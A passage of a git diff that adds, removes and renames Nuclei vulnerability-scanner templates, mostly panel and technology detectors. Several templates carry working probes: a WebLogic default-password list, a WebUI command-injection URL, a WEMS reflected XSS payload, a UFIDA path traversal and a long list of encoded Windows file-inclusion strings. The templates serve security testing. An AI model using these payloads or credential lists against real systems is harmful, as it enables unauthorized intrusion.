weblogic123 + - 12345678 + - security + - password + stop-at-first-match: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: header + words: + - "/console/index.jsp" + - "ADMINCONSOLESESSION" + condition: and + - type: status + status: + - 302 diff --git a/nuclei-templates/Other/weblogic-weak-login-11155.yaml b/nuclei-templates/Other/weblogic-weak-login-11155.yaml deleted file mode 100644 index 272933d9cf..0000000000 --- a/nuclei-templates/Other/weblogic-weak-login-11155.yaml +++ /dev/null @@ -1,58 +0,0 @@ -id: weblogic-weak-login - -info: - name: WebLogic weak login - author: pdteam - severity: high - tags: default-login,weblogic - reference: https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - -requests: - - raw: - - | - GET /console/ HTTP/1.1 - Host: {{Hostname}} - - - | - POST /console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8 - - attack: pitchfork - payloads: - username: - - weblogic - - weblogic - - weblogic - - weblogic - - weblogic - - admin - - admin - - system - - password: - - weblogic - - weblogic1 - - welcome1 - - Oracle@123 - - weblogic123 - - 12345678 - - security - - password - - stop-at-first-match: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: header - words: - - "/console/index.jsp" - - "ADMINCONSOLESESSION" - condition: and - - - type: status - status: - - 302 \ No newline at end of file diff --git a/nuclei-templates/Other/webmin-panel.yaml b/nuclei-templates/Other/webmin-panel.yaml index 4ddaa63d7d..9700b94700 100644 --- a/nuclei-templates/Other/webmin-panel.yaml +++ b/nuclei-templates/Other/webmin-panel.yaml @@ -3,7 +3,7 @@ info: name: Webmin Admin Panel author: PR3R00T severity: info - tags: panel + tags: panel,webmin requests: - method: GET path: diff --git a/nuclei-templates/Other/webmodule-ee-11162.yaml b/nuclei-templates/Other/webmodule-ee-11162.yaml deleted file mode 100644 index b4aa17abf0..0000000000 --- a/nuclei-templates/Other/webmodule-ee-11162.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: webmodule-ee-detection - -info: - name: Webmodule Detection - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7001 - tags: webmodule-ee,tech - -requests: - - method: GET - path: - - "{{BaseURL}}/webmodule-ee/login.seam" - - matchers-condition: and - matchers: - - type: word - words: - - "Webmodule" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/webmodule-ee-panel-11160.yaml b/nuclei-templates/Other/webmodule-ee-panel-11160.yaml deleted file mode 100644 index 0ac4f553f3..0000000000 --- a/nuclei-templates/Other/webmodule-ee-panel-11160.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: webmodule-ee-panel - -info: - name: Webmodule Login Panel - Detect - author: pussycat0x,daffainfo - severity: info - description: Webmodule login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7001 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - metadata: - google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" - max-request: 1 - shodan-query: title:"Webmodule" - tags: edb,panel,webmodule-ee,login - -http: - - method: GET - path: - - "{{BaseURL}}/webmodule-ee/login.seam" - - matchers-condition: and - matchers: - - type: word - words: - - "Webmodule" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Version: ([0-9.]+)' -# digest: 490a0046304402203623bd0f4a6a6fff9c09d23d1783f9f63aa6089f1dea168021eeab5d697702b80220335afcbb9b10b764d3f4fc2f2e07f8a5080a85576df6d0e928658c1adbff01ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/webmodule-ee-panel.yaml b/nuclei-templates/Other/webmodule-ee-panel.yaml new file mode 100644 index 0000000000..11a84abdd2 --- /dev/null +++ b/nuclei-templates/Other/webmodule-ee-panel.yaml @@ -0,0 +1,32 @@ +id: webmodule-ee-panel + +info: + name: Webmodule Login Panel + author: pussycat0x,daffainfo + severity: info + metadata: + google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" + reference: https://www.exploit-db.com/ghdb/7001 + tags: panel,webmodule-ee,login + +requests: + - method: GET + path: + - "{{BaseURL}}/webmodule-ee/login.seam" + + matchers-condition: and + matchers: + - type: word + words: + - "Webmodule" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Version: ([0-9.]+)' \ No newline at end of file diff --git a/nuclei-templates/Other/webmodule-ee.yaml b/nuclei-templates/Other/webmodule-ee.yaml new file mode 100644 index 0000000000..ab6ad7a796 --- /dev/null +++ b/nuclei-templates/Other/webmodule-ee.yaml @@ -0,0 +1,19 @@ +id: webmodule-ee-detection +info: + name: Webmodule Detection + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7001 + tags: webmodule-ee,tech +requests: + - method: GET + path: + - "{{BaseURL}}/webmodule-ee/login.seam" + matchers-condition: and + matchers: + - type: word + words: + - "Webmodule" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/webtools-home-11169.yaml b/nuclei-templates/Other/webtools-home-11169.yaml deleted file mode 100644 index 34af4f516a..0000000000 --- a/nuclei-templates/Other/webtools-home-11169.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: webtools-home - -info: - name: Webtools Home - author: dhiyaneshDK - severity: info - tags: iot - metadata: - shodan-query: 'http.title:"Webtools"' - -requests: - - method: GET - path: - - "{{BaseURL}}/wt2parser.cgi?home_en" - - matchers-condition: and - matchers: - - type: word - words: - - 'WebTools | Home' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/webtools-home.yaml b/nuclei-templates/Other/webtools-home.yaml new file mode 100644 index 0000000000..a82b0b1183 --- /dev/null +++ b/nuclei-templates/Other/webtools-home.yaml @@ -0,0 +1,20 @@ +id: webtools-home +info: + name: Webtools Home + author: dhiyaneshDK + severity: info + tags: iot + metadata: + shodan-query: 'http.title:"Webtools"' +requests: + - method: GET + path: + - "{{BaseURL}}/wt2parser.cgi?home_en" + matchers-condition: and + matchers: + - type: word + words: + - 'WebTools | Home' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/webui-rce-11173.yaml b/nuclei-templates/Other/webui-rce-11173.yaml deleted file mode 100644 index 384fe2d49f..0000000000 --- a/nuclei-templates/Other/webui-rce-11173.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: webui-rce -info: - name: WebUI 1.5b6 RCE - author: pikpikcu - severity: critical - description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. - reference: https://www.exploit-db.com/exploits/36821 - tags: webui,rce - - -requests: - - method: GET - path: - - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' - - matchers-condition: and - matchers: - - type: word - words: - - "c5b3d7397a90f42d222f7ed9408c0dc6" - part: body - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/webui-rce.yaml b/nuclei-templates/Other/webui-rce.yaml new file mode 100644 index 0000000000..8ecef2ff8d --- /dev/null +++ b/nuclei-templates/Other/webui-rce.yaml @@ -0,0 +1,22 @@ +id: webui-rce +info: + name: WebUI 1.5b6 RCE + author: pikpikcu + severity: critical + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 + tags: webui,rce +requests: + - method: GET + path: + - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27' + matchers-condition: and + matchers: + - type: word + words: + - "c5b3d7397a90f42d222f7ed9408c0dc6" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/webview-addjavascript-interface-11176.yaml b/nuclei-templates/Other/webview-addjavascript-interface-11176.yaml new file mode 100644 index 0000000000..49c7786cd6 --- /dev/null +++ b/nuclei-templates/Other/webview-addjavascript-interface-11176.yaml @@ -0,0 +1,13 @@ +id: webview-addjavascript-interface +info: + name: Webview addJavascript Interface Usage + author: gaurang + severity: info + tags: android,file +file: + - extensions: + - all + matchers: + - type: word + words: + - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" diff --git a/nuclei-templates/Other/webview-addjavascript-interface-11177.yaml b/nuclei-templates/Other/webview-addjavascript-interface-11177.yaml deleted file mode 100644 index 06e26a26dd..0000000000 --- a/nuclei-templates/Other/webview-addjavascript-interface-11177.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: webview-addjavascript-interface - -info: - name: Webview addJavascript Interface Usage - author: gaurang - severity: info - tags: android,file - -file: - - extensions: - - all - - matchers: - - type: word - words: - - ";->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V" \ No newline at end of file diff --git a/nuclei-templates/Other/webview-javascript-11179.yaml b/nuclei-templates/Other/webview-javascript-11179.yaml new file mode 100644 index 0000000000..a89445fa50 --- /dev/null +++ b/nuclei-templates/Other/webview-javascript-11179.yaml @@ -0,0 +1,12 @@ +id: webview-javascript-enabled +info: + name: Webview JavaScript enabled + author: gaurang + severity: info +file: + - extensions: + - all + matchers: + - type: word + words: + - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" diff --git a/nuclei-templates/Other/webview-javascript.yaml b/nuclei-templates/Other/webview-javascript.yaml deleted file mode 100644 index 026d8c3ec9..0000000000 --- a/nuclei-templates/Other/webview-javascript.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: webview-javascript-enabled -info: - name: Webview JavaScript enabled - author: gaurang - severity: info - tags: android,file,javascript -file: - - extensions: - - all - matchers: - - type: word - words: - - "Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V" diff --git a/nuclei-templates/Other/webview-load-url-11182.yaml b/nuclei-templates/Other/webview-load-url-11180.yaml similarity index 100% rename from nuclei-templates/Other/webview-load-url-11182.yaml rename to nuclei-templates/Other/webview-load-url-11180.yaml diff --git a/nuclei-templates/Other/webview-universal-access.yaml b/nuclei-templates/Other/webview-universal-access-11184.yaml similarity index 100% rename from nuclei-templates/Other/webview-universal-access.yaml rename to nuclei-templates/Other/webview-universal-access-11184.yaml diff --git a/nuclei-templates/Other/weekender-newspaper-open-redirect-11186.yaml b/nuclei-templates/Other/weekender-newspaper-open-redirect-11186.yaml index c7641f841a..28002d2c85 100644 --- a/nuclei-templates/Other/weekender-newspaper-open-redirect-11186.yaml +++ b/nuclei-templates/Other/weekender-newspaper-open-redirect-11186.yaml @@ -1,18 +1,16 @@ id: weekender-newspaper-open-redirect - info: name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection author: 0x_Akoko severity: low description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL. - reference: https://cxsecurity.com/issue/WLB-2020040103 + reference: + - https://cxsecurity.com/issue/WLB-2020040103 tags: wordpress,wp-plugin,redirect - requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" - matchers: - type: regex regex: diff --git a/nuclei-templates/Other/wems-manager-xss-11192.yaml b/nuclei-templates/Other/wems-manager-xss-11192.yaml new file mode 100644 index 0000000000..db201ad502 --- /dev/null +++ b/nuclei-templates/Other/wems-manager-xss-11192.yaml @@ -0,0 +1,28 @@ +id: wems-manager-xss + +info: + name: WEMS Enterprise Manager XSS + author: pikpikcu + severity: medium + tags: xss + description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. + reference: + - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html + +requests: + - method: GET + path: + - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - '">' + part: body + - type: word + words: + - "text/html" + part: header \ No newline at end of file diff --git a/nuclei-templates/Other/wems-manager-xss.yaml b/nuclei-templates/Other/wems-manager-xss.yaml deleted file mode 100644 index 8b70fab0a9..0000000000 --- a/nuclei-templates/Other/wems-manager-xss.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wems-manager-xss -info: - name: WEMS Enterprise Manager - Cross-Site Scripting - author: pikpikcu - severity: medium - description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter. - reference: - - https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html - tags: xss -requests: - - method: GET - path: - - '{{BaseURL}}/guest/users/forgotten?email=%22%3E%3Cscript%3Econfirm(document.domain)%3C/script%3E' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '">' - part: body - - type: word - words: - - "text/html" - part: header diff --git a/nuclei-templates/Other/werkzeug-debugger-detect-11198.yaml b/nuclei-templates/Other/werkzeug-debugger-detect-11198.yaml new file mode 100644 index 0000000000..aa90f4c1a3 --- /dev/null +++ b/nuclei-templates/Other/werkzeug-debugger-detect-11198.yaml @@ -0,0 +1,17 @@ +id: werkzeug-debugger-detect + +info: + name: Werkzeug debugger console + author: pdteam + severity: info + tags: tech,werkzeug + +requests: + - method: GET + path: + - "{{BaseURL}}/console" + matchers: + - type: word + words: + - "

    Interactive Console

    " + part: body diff --git a/nuclei-templates/Other/werkzeug-debugger-detect.yaml b/nuclei-templates/Other/werkzeug-debugger-detect.yaml deleted file mode 100644 index 767dbafe12..0000000000 --- a/nuclei-templates/Other/werkzeug-debugger-detect.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: werkzeug-debugger-detect -info: - name: Werkzeug debugger console - author: pdnuclei - projectdiscovery.io - severity: info -requests: - - method: GET - path: - - "{{BaseURL}}/console" - matchers: - - type: word - words: - - "

    Interactive Console

    " - part: body diff --git a/nuclei-templates/Other/whm-login-detect-11199.yaml b/nuclei-templates/Other/whm-login-detect-11199.yaml new file mode 100644 index 0000000000..5196b41d8e --- /dev/null +++ b/nuclei-templates/Other/whm-login-detect-11199.yaml @@ -0,0 +1,22 @@ +id: whm-login-detect +info: + name: WHM Login Detect + author: pussycat0x + severity: info + reference: https://www.exploit-db.com/ghdb/7128 + tags: whm,panel,login + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + - type: word + words: + - "WHM Login" + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/whm-login-detect.yaml b/nuclei-templates/Other/whm-login-detect.yaml deleted file mode 100644 index f775e034eb..0000000000 --- a/nuclei-templates/Other/whm-login-detect.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: whm-login-detect -info: - name: WHM Login Detect - author: pussycat0x - severity: info - reference: https://www.exploit-db.com/ghdb/7128 - tags: whm,panel,login -requests: - - method: GET - path: - - "{{BaseURL}}/" - matchers-condition: and - matchers: - - type: word - words: - - "WHM Login" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wifisky-default-login.yaml b/nuclei-templates/Other/wifisky-default-login-11202.yaml similarity index 100% rename from nuclei-templates/Other/wifisky-default-login.yaml rename to nuclei-templates/Other/wifisky-default-login-11202.yaml diff --git a/nuclei-templates/Other/wildcard-postmessage-11207.yaml b/nuclei-templates/Other/wildcard-postmessage-11207.yaml new file mode 100644 index 0000000000..f22b0e015f --- /dev/null +++ b/nuclei-templates/Other/wildcard-postmessage-11207.yaml @@ -0,0 +1,18 @@ +id: wildcard-postmessage + +info: + name: Wildcard postMessage detection + author: pdteam + severity: info + reference: https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html + tags: xss,postmessage + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: regex + regex: + - postMessage\([a-zA-Z]+,["']\*["']\) diff --git a/nuclei-templates/Other/wildcard-postmessage.yaml b/nuclei-templates/Other/wildcard-postmessage.yaml deleted file mode 100644 index ebe404e8c3..0000000000 --- a/nuclei-templates/Other/wildcard-postmessage.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: wildcard-postmessage -info: - name: Wildcard postMessage detection - author: pdteam - severity: info - reference: https://jlajara.gitlab.io/web/2020/06/12/Dom_XSS_PostMessage.html - tags: xss,postmessage -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: regex - regex: - - postMessage\([a-zA-Z]+,["']\*["']\) diff --git a/nuclei-templates/Other/window-name-domxss-11214.yaml b/nuclei-templates/Other/window-name-domxss-11214.yaml index 281671033b..98bbe26a84 100644 --- a/nuclei-templates/Other/window-name-domxss-11214.yaml +++ b/nuclei-templates/Other/window-name-domxss-11214.yaml @@ -1,11 +1,12 @@ id: window-name-domxss + info: - name: window.name - DOM Cross-Site Scripting + name: window.name DOM XSS author: pdteam severity: medium - reference: - - https://public-firing-range.appspot.com/dom/index.html + reference: https://public-firing-range.appspot.com/dom/index.html tags: headless,xss,domxss + headless: - steps: - action: setheader diff --git a/nuclei-templates/Other/windows.yaml b/nuclei-templates/Other/windows.yaml deleted file mode 100644 index bff8e17be2..0000000000 --- a/nuclei-templates/Other/windows.yaml +++ /dev/null @@ -1,71 +0,0 @@ -id: windows-lfi-fuzz - -info: - name: Local File Inclusion - Windows - author: pussycat0x - severity: high - tags: lfi,windows,dast - -http: - - method: GET - path: - - '{{BaseURL}}' - - payloads: - win_fuzz: - - '\WINDOWS\win.ini' - - '\WINDOWS\win.ini' - - '\WINDOWS\win.ini%00' - - '\WINNT\win.ini' - - '\WINNT\win.ini%00' - - 'windows/win.ini%00' - - '../../windows/win.ini' - - '....//....//windows/win.ini' - - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini' - - '../../../../../windows/win.ini' - - '/..///////..////..//////windows/win.ini' - - '/../../../../../../../../../windows/win.ini' - - './../../../../../../../../../../windows/win.ini' - - '/...\...\...\...\...\...\...\...\...\windows\win.ini' - - '/.../.../.../.../.../.../.../.../.../windows/win.ini' - - '/..../..../..../..../..../..../..../..../..../windows/win.ini' - - '/....\....\....\....\....\....\....\....\....\windows\win.ini' - - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini' - - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini' - - '..%2f..%2f..%2f..%2fwindows/win.ini' - - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini' - - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' - - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' - - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00' - - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini' - - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini' - - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini' - - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini' - - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini' - - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini' - - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini' - - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' - - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini' - - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini' - - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini' - - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini' - - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini' - - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini' - - fuzzing: - - part: query - type: replace # replaces existing parameter value with fuzz payload - mode: multiple # replaces all parameters value with fuzz payload - fuzz: - - '{{win_fuzz}}' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/Other/wireless-leakage(1).yaml b/nuclei-templates/Other/wireless-leakage(1).yaml index 573e2150e1..0d81aad4f2 100644 --- a/nuclei-templates/Other/wireless-leakage(1).yaml +++ b/nuclei-templates/Other/wireless-leakage(1).yaml @@ -1,4 +1,5 @@ id: Wireless-leakage + info: name: Wireless-leakage author: str1am @@ -6,15 +7,18 @@ info: reference: - https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=26003&highlight=cms tags: 74cms,sqli + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/DownloadCfg/RouterCfm.cfg" + matchers-condition: and matchers: - type: word words: - "passwd" + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/wishpond-takeover-11215.yaml b/nuclei-templates/Other/wishpond-takeover-11215.yaml deleted file mode 100644 index 10b6648ade..0000000000 --- a/nuclei-templates/Other/wishpond-takeover-11215.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: wishpond-takeover - -info: - name: wishpond takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - https://www.wishpond.com/404?campaign=true \ No newline at end of file diff --git a/nuclei-templates/Other/wishpond-takeover.yaml b/nuclei-templates/Other/wishpond-takeover.yaml new file mode 100644 index 0000000000..fc661ea435 --- /dev/null +++ b/nuclei-templates/Other/wishpond-takeover.yaml @@ -0,0 +1,16 @@ +id: wishpond-takeover +info: + name: wishpond takeover detection + author: pdteam + severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - https://www.wishpond.com/404?campaign=true diff --git a/nuclei-templates/Other/wix-takeover-11219.yaml b/nuclei-templates/Other/wix-takeover-11219.yaml deleted file mode 100644 index d5f320f4f6..0000000000 --- a/nuclei-templates/Other/wix-takeover-11219.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wix-takeover - -info: - name: Wix Takeover Detection - author: harshinsecurity,philippedelteil - description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over. - severity: high - tags: takeover,wix - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - condition: or - words: - - 'Error ConnectYourDomain occurred' - - 'wixErrorPagesApp' - - - type: status - status: - - 404 \ No newline at end of file diff --git a/nuclei-templates/Other/wix-takeover.yaml b/nuclei-templates/Other/wix-takeover.yaml new file mode 100644 index 0000000000..652ccf2107 --- /dev/null +++ b/nuclei-templates/Other/wix-takeover.yaml @@ -0,0 +1,22 @@ +id: wix-takeover +info: + name: Wix Takeover Detection + author: harshinsecurity,philippedelteil + description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over. + severity: high + tags: takeover,wix + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231 +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + condition: or + words: + - 'Error ConnectYourDomain occurred' + - 'wixErrorPagesApp' + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/wondercms-detect-11222.yaml b/nuclei-templates/Other/wondercms-detect-11222.yaml deleted file mode 100644 index 3edc662811..0000000000 --- a/nuclei-templates/Other/wondercms-detect-11222.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wondercms-detect - -info: - name: WonderCMS Detect - author: pikpikcu - severity: info - tags: tech,wondercms - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Powered by WonderCMS" - - "https://www.wondercms.com" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wondercms-detect-11223.yaml b/nuclei-templates/Other/wondercms-detect-11223.yaml new file mode 100644 index 0000000000..61bab8c496 --- /dev/null +++ b/nuclei-templates/Other/wondercms-detect-11223.yaml @@ -0,0 +1,21 @@ +id: wondercms-detect +info: + name: WonderCMS Detect + author: pikpikcu + severity: info + tags: tech,wondercms +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + part: header + words: + - "Set-Cookie: wondercms_" + - type: word + part: body + words: + - "Powered by WonderCMS" + - "https://www.wondercms.com" + condition: and diff --git a/nuclei-templates/Other/wooyun-2015-148227-11224.yaml b/nuclei-templates/Other/wooyun-2015-148227.yaml similarity index 100% rename from nuclei-templates/Other/wooyun-2015-148227-11224.yaml rename to nuclei-templates/Other/wooyun-2015-148227.yaml diff --git a/nuclei-templates/Other/wooyun-path-traversal-11232.yaml b/nuclei-templates/Other/wooyun-path-traversal-11232.yaml deleted file mode 100644 index 9c16b43a73..0000000000 --- a/nuclei-templates/Other/wooyun-path-traversal-11232.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wooyun-path-traversal - -info: - name: Wooyun Path Traversal - author: pikpikcu - severity: high - reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html - description: | - A general document of UFIDA ERP-NC contains a vulnerability - (affecting a large number of well-known school government and enterprise cases - such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) - tags: lfi,wooyun - -requests: - - method: GET - path: - - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - - - - part: body - condition: and diff --git a/nuclei-templates/Other/wooyun-path-traversal.yaml b/nuclei-templates/Other/wooyun-path-traversal.yaml new file mode 100644 index 0000000000..4c70e5a75d --- /dev/null +++ b/nuclei-templates/Other/wooyun-path-traversal.yaml @@ -0,0 +1,26 @@ +id: wooyun-path-traversal +info: + name: Wooyun Path Traversal + author: pikpikcu + severity: high + reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html + description: | + A general document of UFIDA ERP-NC contains a vulnerability + (affecting a large number of well-known school government and enterprise cases + such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo) + tags: lfi +requests: + - method: GET + path: + - "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - + - + part: body + condition: and diff --git a/nuclei-templates/Other/wordpress-accessible-wpconfig-11235.yaml b/nuclei-templates/Other/wordpress-accessible-wpconfig-11238.yaml similarity index 100% rename from nuclei-templates/Other/wordpress-accessible-wpconfig-11235.yaml rename to nuclei-templates/Other/wordpress-accessible-wpconfig-11238.yaml diff --git a/nuclei-templates/Other/wordpress-affiliatewp-log-11240.yaml b/nuclei-templates/Other/wordpress-affiliatewp-log-11240.yaml deleted file mode 100644 index ecacdbc600..0000000000 --- a/nuclei-templates/Other/wordpress-affiliatewp-log-11240.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wordpress-affiliatewp-log -info: - name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure - author: dhiyaneshDK - severity: low - tags: wordpress,log,plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' - matchers-condition: and - matchers: - - type: word - words: - - 'Referral could not be retrieved' - - 'Affiliate CSV' - - type: word - words: - - 'text/plain' - part: header - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wordpress-affiliatewp-log-11242.yaml b/nuclei-templates/Other/wordpress-affiliatewp-log-11242.yaml new file mode 100644 index 0000000000..4b29345142 --- /dev/null +++ b/nuclei-templates/Other/wordpress-affiliatewp-log-11242.yaml @@ -0,0 +1,28 @@ +id: wordpress-affiliatewp-log + +info: + name: WordPress Plugin "AffiliateWP – Allowed Products" Log Disclosure + author: dhiyaneshDK + severity: low + tags: wordpress,log,plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/affwp-debug.log' + + matchers-condition: and + matchers: + - type: word + words: + - 'Referral could not be retrieved' + - 'Affiliate CSV' + + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wordpress-bbpress-plugin-listing-11247.yaml b/nuclei-templates/Other/wordpress-bbpress-plugin-listing-11245.yaml similarity index 100% rename from 